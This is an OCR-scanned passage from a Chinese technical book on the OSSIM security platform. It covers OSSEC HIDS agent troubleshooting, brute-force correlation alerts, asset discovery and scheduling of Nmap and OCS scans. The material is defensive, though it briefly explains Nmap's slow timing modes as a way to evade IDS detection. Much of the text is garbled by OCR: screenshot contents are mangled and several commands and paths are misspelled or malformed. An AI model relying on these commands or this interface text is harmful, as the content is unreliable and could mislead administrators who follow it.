改 的 内 容 还 原 , 但 这 次 事件 还 是 被 Agent 捕捉 并 发 
送 到 Server。 EE en 
加 密 日 志 源源 不 断 地 从 Agent 主机 发 送 到 1921689114440) > SeorpsP mg o 
Server， 我 们 要 如 何 快 速 地 分 辨 各 种 类 型 的 事件 ,i n 
呢 ? Æ SIEM 控制 台中 , 合理 利用 日 志 过 滤 功 能 可 cess Osier m 
解决 该 问题 。 下 面 以 过 滤 HIDS 日 志 为 例 ， 首 先 选 图 9-43 过 滤 条 件 
择 数 据 源 Data Sources:Alienvault Hids， 系 统 立 即 
显示 出 查询 结果 ， 然 后 继续 输入 一 个 检索 条 件 Agent 地 址 192.168.91.144， 如 图 9-43 所 示 。 


ASSET GROUPS 'OTX IP REPUTATION EAR FILT 

; m ui mi z 
© kast Day . 

Last Week DATA SOURCE GROUPS NETWORK CROUPS. Om PutsE * 

Last Month [ I zl Puise name 
aa SENSORS EXCLUDE RISK 
e -5 [ s] Ig C ONLY OTX PULSE ACTIVITY 

uo. Mee EEC 


‘th ‘GROUPED 


ee EX 


LJ]. Aienvau MIDS Host based anomaly detection event (rooeeheck) E 


1 20:5 1008 ia 
Aienvau HIDS System Audit event n 20151008 164 
AlenWauit HIDS: New dpkg (Debian Package) installed. s 1 2015-1008 16 
Allenvauic HIDS: HIDS agent started a 1 2015-1008 194 


图 9-44 经 过 多 个 过 滤 条 件 筛选 出 的 聚合 HIDS 事件 
3. 典型 安装 故障 举例 
在 安装 Agent 过 程 中 会 发 生 各 种 问题 ， 以 下 列举 了 常见 的 3 个 场景 : 
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场景 1: 当 代理 没有 启动 时 ,在 OSSIM 上 收 不 到 日 志 , 这 时 我 们 检查 Windows 系统 中 agent 
是 否 启 动 , 在 开始 一 运行 中 输入 “ services.msc” 命 令 , 打开 服务 管理 控制 台 , 找到 OSSEC HIDS 
服务 〈 后 台 对 应 ossec-agentexe 文件 )。 

场景 2: 通常 OSSEC 服务 随 系统 自动 运行 ， 有 时 服务 器 端 遇 到 问题 ， 客 户 机 无 法 连接 ， 
可 以 通过 以 下 命令 手工 重启 服务 。 


#/var/ossec/bin/ossec-control start 
#/var/ossec/bin/ossec-control stop 


场景 3: syscheck 进程 停止 扫描 系统 ， 若 让 它 立 即 执行 ， 输 入 以 下 命令 


#/var/ossec/bin/bin/agent_control -r -a 
OSSEC HIDS agent_control:Restarting Syscheck/Rootcheck on all 
agents.alienvault:/var/ossec/etc 


以 下 是 关于 agent. control 更 多 控制 选项 


€ h 显示 帮助 消息 。 

© -: 列 出 所 有 可 能 的 代理 。 

€ -lc: 列 出 活动 的 代理 。 

€ -icagent id: 获取 代理 的 相关 信息 agent. id. 

€ rn 代理 中 的 integrity/rootcheck 检查 ， 要 和 -u 或 -a 一 起 使 用 。 
€ a: 对 所 有 代理 都 起 作用 。 
e. 
Ji 


-u-agent id» «agent id»: 预先 指定 代理 ID 号。 
动 与 停止 OSSEC HIDS: 
€ 启动 : 4varlosssec/bin/ossec-control star 
€ 停止: dlvarlossec/bin/ossec-control stop 
Ossec-server 和 Agent 之 间 需 要 用 到 UDP 1514 通信 ， 在 排除 故障 过 程 中 ， 监 听 该 端口 显 
得 尤为 重要 ， 在 OSSEC Server 端 通过 ngrep 命令 进行 的 操作 效果 如 图 9-45 所 示 。 


#ngrep -q -d any port 1514 


¥en t a one: ~# ngrep -q -d any port 1514 
interfac I EU TTPP Gc asd 
filter: Gp. o ip6) and ( port 1514 ) 


U 192.168.11.2:49836 -> 192.168.11.150:1514 
Dess Co 1o eU, ST Vs . (80. j-T.p..m.p. 


9-45 采用 ngrep 过 滤 
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9.3.5 OSSEC 触发 的 关联 分 析 报 警 


当 服 务 器 遭受 暴力 破解 时 ，HIDS 会 发 送 大 量 失败 事件 到 Server 端 ， 有 关联 引擎 分 析 、 归 


纳 聚 合 这 些 报警 信息 后 ， 再 将 告警 信息 发 到 SIEM 控制 台 


， 在 图 9-46 所 示 的 实例 中 ， 展 示 出 


-条 高 风险 告警 , 从 告警 特征 可 以 明显 看 出 这 是 针对 Windows2012DC1 主机 进行 的 暴力 破解 ， 


想 要 查看 详细 信息 还 需要 点 击 这 条 报警 ， 进 入 SIEM 事件 继续 查看 。 


EVENTS OU 
CHANGEVIEW ~ M ACTIONS - 
由 高 序 
SIGNATURE ir DATE UTC SENSOR OTX SOURCE DESTINATION „ORKO 
一 条 高 风 8 由 低 到 高 排序 
GECUVE-EVETE AV BrUTETOTCE SUCK 
Mf 日 |ws authentication attack against 100.01 T4 20151012 22:43.07 EEE NA Windows2012DC1 Windows2012DC1 | | 


图 9-46 针对 Windows 系统 的 暴力 破解 告警 


当 点 击 这 条 事件 后 ， 在 Security Events 中 立即 显示 该 事件 详情 以 及 原始 日 志 ， 如 图 9-47 
所 示 。 关 联 事件 名 称 为 “AV Bruteforce attack, Windows authentication attack against 172.x.y.z". 


SECURITY EVENTS (SIEM) 
SIEM REAL-TIME EXTERNAL DATABASE 
Security Events directive event: AV Bruteforce attack, Windows authentication attack against DST_IP NEX 


directive event: AV Bruteforce attack, Windows authentication attack against 1 088892799 


DATE 


2015-10-12 22:43:07 UTC CATEGORY Alarm 

ALIENVAULT SENSOR — SUE-CATEGORY Sruteforce 

DEVICE IP N/A DATA SOURCE NAME directive alert 

EVENT TYPE ID 50005 DATA SOURCE ID 1505 

UNIQUE EVENT ID puce d E DELL PRODUCT TYPE Alarm 

PROTOCOL TcP ADDITIONAL INFO N/A 
USERNAME USERDATAL USERDATA2 USERDATAS USERDATA4 USERDATAS 
Rai trace p [scii Tm | Ser or bad password. | Xn 3 
USERDATAS USERDATA7 USERDATA8 USERDATA9 

WIN-ALUIDISPRRM 992313 * OIS-DDMS 


RAWLOG 


27] 
0 Rule 4 [201 


7085:18130] 


9-47 关联 分 析 事 件 详情 
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ty: 4 Rule 1 [2015-10 


1:0 -> 17- 


:36:25] [7085:18130] [Rel: 
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用 实 点 


传统 OSSEC 无 法 将 这 类 关联 分 析 报 警 展示 给 用 户 ， 而 通过 OSSIM 中 的 关联 分 析 却 能 实 
现 ， 关 联 分 析 策略 在 本 书 第 4 章 已 经 详细 讲解 过 ， 这 里 仅 介绍 触发 如 图 9-40 所 示 这 条 报警 的 


关联 指令 规则 ， 如 图 9-48 所 示 。 


7" AlienVault BruteForce [15 directives] 


Pow AV-FREE-FEED Bruteforce attack, login authentication attack against DST IP 
æ Delivery & Attack, Bruteforce Authentication, Linux/Unix - Priority 4 
- 45 AV-FREE-FEED Bruteforce attack. Windows authentication attack against DST IP 
Delivery & Attack, Bruteforce Authentication, Windows Login - Priority 4 
¥ RULES 
NAME RELIABILITY TIMEOUT OCCURRENCE FROM To DATA SOURCE EVENT TYPE | 
SIDs 
Anenvauit HIDS- 18106 
"€ Windows authentication failure attempts 1 None 1 ANY ANY wimauthenücatonfalled — 18130 > 
cn] 18136 
SIDs 
AlienVault HIDS- 18106 
"w Windows Authentication failure 2 15 3 ISRCIP  LDSTIP winauthentication failed — 18130 — » 
(7085) 18135 
18136 
SIDs: 
AlienVault HIDS- 18106 
"€ Windows Authentication failure + 30 10 15RCIP 1D5TIP win authentication failed — 18130 —» 
(7085) 18135 
18136 
SIDs: 
Ahenvautt HIDS- 18106 
"€ Windows Authentication failure 6 300 50 LSRCIP LDSTIP win authentication failed — 18130 — » 
(7085) 18135 
18136 
SIDs 
AlienVault HIDS- 18106 
"w Windows Authentication failure 10 1000 200 ISRCIP LDSTIP winauthentication failed — 18130 — » 
(7085) 18135 
18136 
SIDs: 
AlienVault HIDS- 18106 
Windows Authentication failure 10 3600 2000 LSRCIP LDSTIP win authenucation Tall 18130 — > 
(7085) 1835 


图 9-48 Windows 暴力 破解 攻击 关联 规则 
在 关联 规则 中 还 包含 一 个 知识 库 ， 描 述 这 种 攻击 特征 和 对 策 ， 


AV-FREE BRUTEFORCE ATTACK, WINDOWS AUTHENTICATION ATTACK AGAINST DST_IP 


如 图 9-49 所 示 。 


DATE Displaying document without compiling. 


Description: 


Brute forcing consists of systematically enumerating all possible combinations of a given username/password Ist. An 


201291-01 approach is to repeatediy try guesses from a common used password username I 

Your system logs indicates that the Windows machine is suffering a bruteforce attack. 

ountermeasures 
USER 
~ Disable unusued services 
T Create an access list to prevent unknown computers accessing this service and restrict remote access 
pa ~ Establishing strong password policies Tor your organization that includes maximum login attempts 

KEYWORDS 


暴力 破解 是 通过 系统 枚 举 所 有 有 可 能 的 用 户 密 码 组 合 的 列 
TRUE a e 表 ， 这 种 方法 是 通过 常用 的 用 户 名 /密码 列表 反复 尝试 ， 你 的 系统 


日 志 显 示 Windows 机 器 正 遭 
对 策 : 
No attached fles -禁用 unusued 服 务 


ATTACHMENTS 


受 暴力 破解 攻击 - 


-创建 访问 列表 ， 用 来 防止 未 知 的 计算 机 访问 ， 并 限制 远程 访问 。 
Hs -创建 增强 密码 策略 ， 包 括 最 大 尝试 登录 次 数 - 


9-49 ”关联 分 析 知 识 库 条 目 
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9.3.10 Rt HIDS 应 用 

除了 以 上 介绍 的 文件 完整 性 、Windows 登录 失败 的 报警 之 外 , 还 有 以 下 几 种 常见 HIDS {R 
警 需要 注意 ， 如 图 9-50 所 示 。 在 OSSIM 4.x 版 本 中 所 有 的 OSSEC Agent 报警 以 Ossec 表示 ， 
而 到 了 OSSIMS.0 之 后 均 以 AlienVault HIDS 表示 。 


PveNr GROUPED 


GROUP EVENTS Bv[Sgnaum [E] ACTIONS » 


SIGNATURE EVEMISe()a UNIQUE SRC # UNIQUE DST # LATEST EVENT GRAPH 
mm T ， | 
Mena IDS Logon Fallar- Unwnown user or bad " 3 1 aa6saa M 

Allen Vault HIDS: Windows Logon Success. s4 1 1 MAATI96QQ i Li ETE 
AlienVault HIDS: Multiple Windows Logon Fallures. Ei 1 7 HEBE 
Allenvauit wios windows User togoff a 1 1424680000 

Aller Vault HIDS. HIDS server started 1 1 1 1444708800 


图 9-50 各 类 HIDS 报警 
此 外 ， 还 有 策略 变更 报警 和 时 钟 修改 告警 也 需要 大 家 注意 。 
1. 策略 更 改 


只 要 在 Windows 系统 上 更 改 了 系统 策略 ，Agent 就 会 发 出 报警 ,在 SIEM 控制 台 能 够 看 到 
如 图 9-51 所 示 的 告警 信息 。 


EVENT DETAILS 


Hostname: Host-192-168-91-140 Location: N/A | Hostname: Host-192-168-91-140 Location: N/A 
MAC Addrass: 00:0C:29:5E:92:77 Context: N/A MAC Address: 00:0C:29:5E:92:77 Context: N/A 
Por: 0 Asset Groups: N/A Por Asset Groups: N/A 
Latest update: N/A Networks late: Networks: Pv. 162 
Username & Domain: N/A Logged Uses Logged Users: N/A 
Asset Value: 2 OTX IP Reputation: No OTX IP Reputation: No 
SERVICE B PORT s PROTOCOL 3 SERVICE B PORT $ PROTOCOL s 
No services available Nosenices available. 
USERDATAL USERDATA2 | USERDATA3 USERDATA4 


^ Windows policy. cnange, Windows Audit Policy changed 612 


9-5] 策略 更 改 告警 
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2. 更 改 系统 时 钟 


一 些 病 毒 会 在 后 台 修改 系统 时 钟 以 达到 不 可 告 人 的 目的 ， 服务 器 系统 时 钟 一 旦 被 修改 , 会 
导致 非常 严重 的 后 果 ， 所 以 需要 密切 关注 ， 监 控 到 系统 时 钟 修改 的 告警 如 图 9-52 所 示 。 


Security Events — AlienVault HIDS: System time changed. PREVIOUS — NEXT 
AlienVault HIDS: System time changed. 

DATE CATEGORY System 

ALIENVAULT SENSOR Demo-A [172.31.43.65] SUB-CATEGORY nged 

DEVICE IP 172.31.55.44 [any] DATA SOURCE NAME AlienVault HIDS-time. changed 

EVENT TYPE ID. 18140 DATA SOURCE ID 7089 

UNIQUE EVENT ID# m Go e iiaeaa PRODUCT TYPE Operating System 

PROTOCOL Tcr ADDITIONAL INFO N/A 

USERDATAL USERDATA2 USERDATA3 USERDATA4 
5 windows.time. changed, System time changed. 4616 


9-52 ”系统 时 钟 修改 报警 


资产 Assets 管理 


在 OSSIM 中 体现 的 一 种 以 资产 为 核心 ， 以 安全 事件 管理 为 关键 流程 ， 基 于 安全 域 提供 准 
实时 资产 风险 评估 、 事 件 关联 、 安 全 预警 及 应 急 响应 功能 的 统一 安全 信息 管理 平台 ,所 以 管理 
的 资产 是 核心 任务 之 一 。 在 新 版 OSSIM 4.8 系统 融入 了 不 少 资产 管理 理念 ， 从 资产 、 漏 洞 和 
威胁 多 个 维度 分 析 网 络 风 险 ， 从 而 提升 了 系统 漏洞 扫描 有 效 的 防御 手段 。 

另 一 款 开源 工具 Zabbix， 可 对 资产 清单 Inventory 进行 管理 ， 可 以 管理 主机 OS 版 本 、IP、 
MAC. PORT, 但 从 资产 安全 运 维 的 角度 来 看 仅 了 解 这 些 信息 还 远 远 不 够 。 资 产 管理 中 可 展示 
出 资产 的 漏洞 数量 、 产 生 网 络 报 警 数 量 、 软 件 包 名 称 、 网 络 服 务 的 状态 、NetFlow 数据 、 监 控 
主机 防 算 改 、 对 资产 的 日 志 分 析 、 标 识 主机 的 坐标 、 在 线 生 成 资产 报告 〈 合 规 ISO PCI 报表 、 
SIEM 事件 报表 、 漏 洞 评 估 报 告 等 )， 而 这 些 重要 内 容 是 OSSIM 最 擅长 提供 的 。 
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9.4.1 资产 发 现 

与 OSSIM 4.1 版 本 相 比 ， 新 版 OSSIM 更 强调 资产 的 安全 管理 。 对 于 列 出 所 有 资产 配置 清 
单 的 界面 在 新 版 体现 得 不 那么 重要 ， 而 在 平台 中 保存 有 IT 资产 详细 信息 ， 其 中 包括 了 资产 的 
IP 地 址 ， 扫 描 结 束 后 系统 根据 发 现 漏洞 的 IP 地 址 ， 自 动 将 该 漏洞 归属 到 相应 的 资产 上 。 我 们 
利用 OSSIM 中 的 Asset Discovery 功能 ， 扫 描 出 监控 网 段 内 的 所 有 资产 情况 ， 并 加 入 数据 库 
中 ， 如 图 9-53 所 示 。 


SCAN RESULTS 
E] Host HOSTNAME (3) FQDN DEVICE TYPES MAC 回 os@ services 
L4 192.168.11.1 Most-192-168-11-1 General Purpose —— ly unux26X domain, http. 
Seo. duri dime au 
H ral Pur Ed] : charpen. Rp, smtp. http, mar 
S senas Host-192-168-11-15 General Purpose ir Windows2000 — Charger fp, smtp http, mape, 
marc 
msrpc, netbios-ssn,netbios-ssn, 
M o 1921681140 Host-192-168-11-40 : ELM OONEEEEEEN Windows/Phone — vmwareauthrsst vmwareauth ms- 
wbt-server, http, vnc-http, vne 
v 192.168.11.100 Ho51-192-168-11-100 Router, Switch es 苞 IOS12X teinet, finger, http 
EA 192.168.11.101 Host-192-168-11-101 a ? unknown 
L4 192.168.11.121 Ho5t-192-168-11-121 - General Purpose 一 一 一 一 Ait Windows/XP msrpc, netbios-ssn, msrpc 
m 192.168.11221 Host-192-168-11-221 - General Purpose M O4] Qunuvz6x ssh 
à in netbios-ssn, netbios-ssn, afp, 
S 019216831233 —— Host192-16811233. General Purpose rr MEN — pri 
M o 19216811235 Host-192-168-11-235. - General Purpose 0 aan hio. rpctied Nepesi orade- 


9-533 ”发 现 网 络 中 的 资产 


对 于 新 发 现 的 资产 ， 我 们 需要 选择 “Update database values” 按 钮 添加 到 数据 库 ， 此 时 注 
意 选 择 “External Asset” 和 “Avaliability Monitoring” 选 项 ， 如 图 9-54 所 示 。 


ASSET DISCOVERY 
Please, fill these global properties about the hosts you've scanned 
Values marked with (*) are mandatory. 


Optional group name Description 


Asset Value * External Asset *| Thresholds * Scan. options 
2 M (€ Yes O No Cho ] Apo] E Availability Monitoring 


Sensors * 


192.168.11.245 (sensor3) 
M1192.168.11.218 (sensor-2) 
M192 158.11 105 (VintualUSMAllInOne) 


192.168.11.89 (alienvault) 


E 
954 ”选择 监控 可 用 性 
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在 图 9-54 中 ， 如 果 设 置 Optional group name， 则 可 实现 将 以 上 资产 设置 在 一 个 组 中 。 


9.4.2 ”资产 地 图 定位 
接着 系统 会 出 现 更 详细 的 设置 内 容 ， 包 括 主 机 、IP、FQDN、Location 设备 类 型 等 ， 如 图 
9-55 所 示 。 图 中 Devices Types 设备 类 型 ， 建 议 尽量 按 功 能 选择 。 


Name* 
[Fosc-192-188-11-220 


"sans 者 
Canet-en-Fouseill! 


Asset Value * External Asset * Latitude/Longitude [42 x 


E T 


Sensors * 


Description Devices Types 


[server " Server M] Mail Server v 


Thresholds* Scan options 


Cpo | Ao | Z avatability monitoring 


图 9-55 资产 定位 标示 


将 扫描 结果 与 资产 的 安全 属性 和 资产 面临 的 威胁 综合 分 析 , 即 可 以 呈现 出 资产 的 安全 风险 
状况 , 为 风险 评估 和 管理 提供 依据 。 通 过 对 业务 系统 和 资产 的 漏洞 情况 分 析 和 对 比 ， 能 为 漏洞 
管理 和 维护 工作 提供 依据 -OSSIM 中 资产 列表 位 于 Web UI 中 的 Environment Assets 菜单 下 ， 
如 图 9-56、 图 9-57、 图 9-58 所 示 。 


9.4.3 ”扫描 控制 参数 

这 个 Web 扫描 的 选项 中 共有 6 个 级 别 0-5)， 级 别 越 高 ， 扫 描 速 度 越 快 ， 但 也 容易 被 防 
火 墙 或 IDS 检测 并 屏蔽 ， 在 网 络 通信 状况 良好 的 情况 下 推荐 使 用 T4 CHI Normal)。 

Timing template 时 序 模板 的 选项 解释 如 下 : 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


Paranoid: 作用 为 了 避 开 IDS, Nmap 进行 所 有 扫描 动作 ， 但 频率 很 低 ， 每 隔 5 分 钟 
才 发 送 一 个 包 ， 所 以 扫描 速度 慢 。 

Sneaky: 和 paranoid 相似 ， 但 间隔 时 间 为 15 秒 。 

Polite: 和 sneaky 相似 ， 只 是 发 送 间隔 为 0.4 秒 ， 这 样 不 会 加 大 网 络 负荷 。 

Normal: Nmap 默认 的 预 设 扫描 方式 。 

Aggressive: 使 用 进攻 性 (Aggressive ) Zr 4348. Æ 5 分 钟 的 超时 限制 ， 假 如 同时 
对 多 台 主机 扫描 ， 采 用 这 种 方式 让 Nmap 对 每 台 主机 的 扫描 时 间 最 多 不 超过 5 分 钟 ， 
并 且 每 次 探测 动作 、 等 待 回应 的 时 间 在 1.5 秒 之 内 。 


而 Insane 与 aggressive 相似 ， 但 超时 时 间 为 75 秒 ， 探 测 回应 的 等 待 时 间 为 0.3 秒 ， 这 适 
用 于 高 速 网 络 环境 ， 其 速度 最 快 。 


9.444 资产 列表 
当 扫描 完成 之 后 ， 即 可 获得 大 量 成 果 ， 这 些 资产 信息 会 一 一 列 在 资产 列表 中 ， 如 图 9-56 
所 示 。 稍 后 我 们 还 需 对 它们 进行 识别 和 矫正 (有些 信息 不 一 定 正确 )。 


国 


REPORTS CONFIGURATION 


DASHBOARDS ANALYSIS 


ASSETS 


ASSETS 


Assets 


E o 


pes 


SAVE GROUP 


Chas alarms. Vulnerabilites: info - Critical x 


Chas Events. 


M vulnerabilities 


Fd 


roon / ALIAS aa J vowesamumis leges) [oe 


e 显示 事件 数量 


显示 FQDH 名 黎 或 别名 


图 9-56 显示 资产 情况 
在 资产 显示 界面 中 ， 可 一 目 了 然 地 查看 所 有 管理 资产 的 基本 信息 ， 例 如 主机 名 称 〔 如 图 
9-57 所 示 )， 收 到 漏洞 数量 (如 图 9-58 所 示 )， 告 警 数量 (如 图 9-59 所 示 )， 安 全 事件 总 数 、 
对 资产 进行 筛选 的 按钮 通过 加 E23 上 前 这 三 个 按钮 (分 别 表 示 : 添加 资产 、 导 出 资产 信 
息 以 及 一 次 性 删除 所 有 资产 列表 ) 实现 。 
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Assets 
Ej Fas Alarms Has vents x Has Alarms x Vulnerabilities: Info - Critical x 
Gras Events. 
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Asset Value HOW (2873) ENTRIE 
e E SE mmm a 
Show Assets Added 
Last Day Host192.168.11.1 192168111 © © © e 
Last Week 
Last Month. Host192.168.11.100 19216811100 © © 
e 
Pim jare pena hes 
[ore s p s pd [om | 
ane sa Cr i 
Host192.168.11.223 19216811223 © © © o 
VrtualUSMAliInOre: 19216801305 © © © E] 


图 9-57 显示 资产 的 事件 详情 


fe 


ANALYSIS. 


DASHBOARDS 


ASSET Dis 


Aset Detuis 


Host.10.32.14 mm 
1032 03 


-LESS DETARS 


Sensor 
1032 wastes (s en vut 


Networks 
Local. 10, 32 emo. 24 (10.32 80/24) 


Operating System Asset Type 
Window 2003 Tea 
Asset Value. 
012345 
ASSETS 
ASSETS ^ ASSETDISCOVERY  Smapshot px 
0 0 No No 
searh — 列 出 产生 告警 的 vin Nama tem 
一 ”公所 有 资产 
DHas Alarms GENERAL. 
[ | nud 
L1 Has Events. 
[Z] vulneral 
info Medium _ Critica} 
EY ies amme o NN - 
Casset value. FHEAR: s €— 
的 所 有 资产 


Hoce 1032 MENU oo 


9-58 ”显示 资产 漏洞 情况 


Men 


B 


REPORTS 


GROUPS & NETWORKS 


VULNERABIL 


NETFLOW 
TRAFFIC CAPTURE 


DETECTION 


TLgEGUIEE 


p 2014514022004 MANUALLOCKED. 


2014114022014 mamuat 


557 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


ASSETS © ASSET DISCOVERY 


Asses Asser Derails 
VirtualUSMAlllnOne Ü — environmenr status 
192.166.1105 
+ MORE DETAILS Hos 
Automatic Asset Discovery 
Snapshot 
Availability Monitoring 
6 0 60 Yes Yes 
ra ses  Vuierabiives Alarms e SUGGESTIONS 
Currently no supgescions 
ACTIVITY 
ALARMS EVENTS | NETFLOW 
$ SAUS NTNTASTMTES = ¢ Wemoo 
204200033738 open 全 nevuri 1 VülUSMAlrOne ^ VituaUSMAlinOre 
2014206123798 open (È) BieeAiertentbn nun So vauswwiron aaa 
01412061338151 on ES S0 VraUSMAlrOne ^ VinvaLSMAINOre 


9-59 ”显示 事件 告警 


如 果 要 显示 FQDN/Alias， 那 么 只 需 在 /etc/hosts 文件 中 ， 添 加 主机 别名 和 对 应 IP， 保 存 退 
出 后 ， 重 新 进行 主机 扫描 ， 在 扫描 出 的 结果 中 更 新 数据 库 即 可 。 还 记得 在 Debian Linux 查看 
主机 名 吗 ? 如 果 忘 记 了 请 查看 /etc/hostname。 

系统 中 实现 资产 管理 的 工具 叫做 OCS Inventory-NG (Open Computer and Software 
Inventory Next Generation)， 是 一 款 用 于 帮助 管理 员 跟 踪 网 络 中 计算 机 配置 与 软件 安装 情况 的 
开源 应 用 程序 。 在 OSSIM 系统 中 ， 利 用 OCS Inventory 发 现 网 络 上 所 有 的 活动 设备 ， 例 如 ， 
交换 机 、 路 由 器 、 网 络 打印 机 ， 可 以 通过 MAC 或 者 IP 地 址 来 对 它们 进行 分 类 。 下 面 我 们 学 
习 OCS 的 基础 知识 。 


| 在 内 网 环境 中 ， 为 了 使 OSSIM 快速 发 现 并 识别 资产 ， 需 要 将 OSSIM 的 DNS 设置 为 内 网 
| DNS 服务 器 地 址 , 而 且 在 /etc/hosts 下 要 有 一 张 IP-Hostname 对 应 表 , 这 样 在 SIEM 下 的 计 
| 算 机 名 称 可 以 一 目 了 然 。 


9.4.5 ”资产 管理 工具 

OSSIM 下 的 资产 管理 工具 数据 源 来 自 OCS-NG， 由 于 OCS-NG 的 Web UI 存在 注入 漏洞 ， 
所 以 从 OSSIM 4.4 版 本 开始 之 后 的 发 行 版 去 除了 OCS 的 管理 界面 ， 但 功能 融入 Assets He F 
前 版 本 并 不 能 理想 地 收集 完整 的 资产 信息 ， 还 有 些 信息 依然 需要 用 户 手动 修改 。 如 图 9-60 所 
IRo 
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EDIT PROPERTIES 


INVENTORY [ LOCAL SCAN NOW ] 


«» Properties 
2 Operating System 
= [v ? unknown 
Date: 2015-04-20 00:09:44 
Source: NMAP 
f Users logged 
3j Role 
a Department 
¿ža Workgroup 
W Machine state 
4 CPU 
49 Memory 
w Video 
$ ACL 
s Route 
E Storage 
+ Bp MAC Address 
* y” Services 
* e Software 


DELETE SELECTED 


Add new property: DET me 
Users logged 
Role 
Department 
Workgroup 
Machine state 


9-60 OSSIM 资产 信息 编辑 界面 


OCS Inventory NG 通过 在 客户 端 上 运行 一 个 代理 程序 (Agent) 来 收集 所 有 的 硬件 的 信息 
和 软件 安装 信息 。 使 用 管理 服务 器 (Management Server) 来 集中 处 理 、 查 看 库存 清单 结果 和 
创建 部 署 包 。 在 管理 服务 器 (Management Server) 与 代理 程序 (agent) 之 间 通 过 Http/Https XE 
行 通信 。 代 理 程 序 需要 安装 在 客户 端 计算 机 上 〈 客 户 端 程序 下 载 位 于 OSSIM Web UI 顶部 
SupportoDownloads 菜单 )。 

OCS Server 端 包括 4 个 组 件 : 
Administration Console: 允许 管理 员 通 过 浏览 器 来 查询 数据 库 服务 器 的 库 信息 ; 
© Communication Server: 支持 数据 库 服务 器 与 代理 之 间 的 HTTP 通信 ; 
Data Server: 用 于 储存 收集 到 的 客户 端的 信息 ; 
€ Deployment Server: 用 于 储存 所 有 的 包 部 署 配置 信息 。 


查看 OCS 数据 库 ， 发 现 很 多 资产 信息 存储 在 alienvault.asset filter 表 中 ， 该 表 又 与 ocsweb 
相关 联 ， 我 们 在 OSSIM 的 Web UI EnvironmentoAsset 菜单 中 显示 资产 的 内 容 就 来 源 此 数据 
库 。 查 看 ocweb 库 的 方法 : 
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#0ssim-db 

mysql> show databases; 
mysql> use ocsweb; 
mysql> show tables; 


9.4.6 ”资产 分 组 

当 企 业 中 存在 大 量 服 务 器 和 网 络 设备 时 ， 将 它们 批量 导入 OSSIM 系统 ， 必 须根 据 功能 或 
者 地 域 进行 分 组 以 便 精细 化 管理 和 监控 。 操 作 步 又 如 下 : 

在 Web UI 中 选择 ENVIRONMENT 一 GROUPS&NETWORKS， 会 进入 如 图 9-61 所 示 界 面 。 


DASHBOARDS ANALYSIS REPORTS CONFIGURATION 


GROUPS& NETWORKS ASSETS P 


GROUPS & NETWORKS 


GROUPS NETWORKS. NETWORK GROUPS VULNERABILITIES 
PROFILES 
s ADD GROUP 
B | Asset Groups NETFLOW 


TRAFFIC CAPTURE 


AVAILABILITY 


7 ONN DETECTION Arus VULNERABILTIE: 


Ne groups found in the system 


9-631 首次 添加 分 组 
此 时 单 击 图 中 右 侧 的 ADD GROUP 按钮 添加 新 的 组 ， 系 统 显 示 界 面 如 图 9-62 所 示 。 


ASSETS o 
ASSETS. ASSET DISCOVERY 
se Assets ü 


Clear All Filter 


C Has Alarms. Asset Value: O - 5 »* 


Cl Has Events 


SAVE GROUP 
C Vulnerabilities 


Ml Asset Value 20 可 ENTRE 

0.15273-4-5 HOSTNAME - P FQDN/ ALIAS ALARMS. VULNERABILITIES. EVENTS. DETAILS. 
Show Assets Added 

DU Host iS2-16891-128 saisis cies: : a 
O Last Week 

Olst orin locas 192168912 locas a 


图 9-62 保存 分 组 信息 
此 时 再 选择 左 侧 “Asset Value” 复 选 框 ， 根 据 资 产值 来 快速 选取 资产 ， 值 0-5 代表 所 有 的 
资产 ， 通 过 调节 该 值 大 小 ， 可 以 过 滤 掉 不 需要 显示 的 资产 ， 最 后 单 击 “ 保 存 ” 按 钮 ， 弹 出 对 话 
框 ， 要 求 输入 “Asset Group Name” 组 名 称 以 及 组 的 描述 信息 ， 再 单 击 “ 保 存 ” 按 钮 ， 整 个 分 
组 过 程 即 完成 。 效 果 如 图 9-63 所 示 。 
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Asset Groups CE i 
HOW [zo[v] ENTRIE 
GROUP NAME © OWNERS) Hosrs ALARMS VULNERABILITIES EVENTS DETAIL 
OAServer-t s z : a 
Webs 2 a 


图 9-63 ”资产 分 组 效果 
同样 ， 如 果 管 理 复杂 的 网 段 ， 还 可 根据 网 络 号 对 网 络 进行 分 组 。 


9.4.7 ”资产 快速 查找 

当 管 理 成 千 上 万 台 网 络 设 备 时 , 仅 靠 分 组 仍 无 法 快速 找到 需要 的 资产 , 因为 显示 分 辨 率 的 
限制 。 TE Assets 左 侧 可 通过 Alarms、Events、Vulnerabilities、 资 产值 以 及 资产 变化 的 情况 查找 ， 
系统 提供 了 更 多 的 筛选 条 件 ,例如 根据 网 段 、 安 全 软件 类 型 、 传 感 器 、 设 备 类 型 、 地 理 位 置 以 
及 如 图 9-64 所 示 的 服务 和 端口 查找 。 


MORE FILTERS 


MI a43/trp (http) 


口 


gagogandgdadaogouaowo 
m m m a Bi B m m m 


9-64 ”根据 服务 和 端口 号 筛选 资产 
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9.4.8 设置 Nmap 扫描 频率 

资产 管理 时 ， 由 于 资产 总 在 变化 ,所 以 需要 周期 性 扫描 以 实时 发 现 资产 的 变化 情况 。 下 面 
开始 设置 Nmap 的 扫描 计划 任务 ， 依 次 选择 Configuration 一 Deployment 一 Scheduler， 在 
“NETWORK TO SCAN ”一 栏 填 入 CIDR〔 无 类 别 域 间 路 由 ) 地 址 ， 如 图 9-65 所 示 。 


DEPLOYMENT 


SCHEDULER SMART EVENT COLLECTION 


Values marked with (*) are mandatory 


NAME * fest 
SENSOR * VirtualUSMAllInOne 
NETWORK TOSCAN* — [192:168.11.0 


192.168.11.0/24 
[LocalL192_166_11_0_24] 

T ] 

© era m 


FREQUENCY Hourly 
ENABLED Yes 


9-65 ”设置 资产 周期 扫描 


单 击 “ 保 存 ” 按 钮 时 ， 系 统 提 示 “The task has been saved successfully”。 使 用 同样 的 方法 
我 们 还 可 以 设置 OCS 和 WMI 的 扫描 周期 。 


9.4.9 OCS 检测 频率 

为 了 实现 OCS 周期 性 检测 ， 可 在 Configuration 一 Deployment 一 Components 一 Sensors 列表 
中 选择 Sensor， 并 在 显示 列表 中 可 发 现任 务 列表 ， 默 认 OCS 检测 频率 为 每 小 时 检测 一 次 ， 如 
图 9-66 所 示 。 


INVENTORY TASK 
NAME TASKTYPE FREQUENCY ACTION 


图 9-66 设置 频率 


OpenVAS 扫描 模块 分 析 


OpenVAS 扫描 模块 是 整个 扫描 系统 的 核心 ， 通 过 对 其 软件 包 内 约 一 万 多 行 代码 的 阅读 分 
析 ， 可 以 知道 该 模块 包含 的 两 大 功能 : 

